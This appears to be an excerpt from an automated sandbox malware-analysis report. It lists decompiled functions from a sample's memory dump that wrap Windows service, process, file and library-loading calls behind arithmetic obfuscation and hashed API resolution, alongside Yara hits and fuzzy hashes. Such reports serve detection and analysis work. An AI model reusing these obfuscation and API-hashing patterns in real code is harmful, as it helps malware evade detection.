                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E0021602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E0021602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E0021602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E0021602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00214859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E0021602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
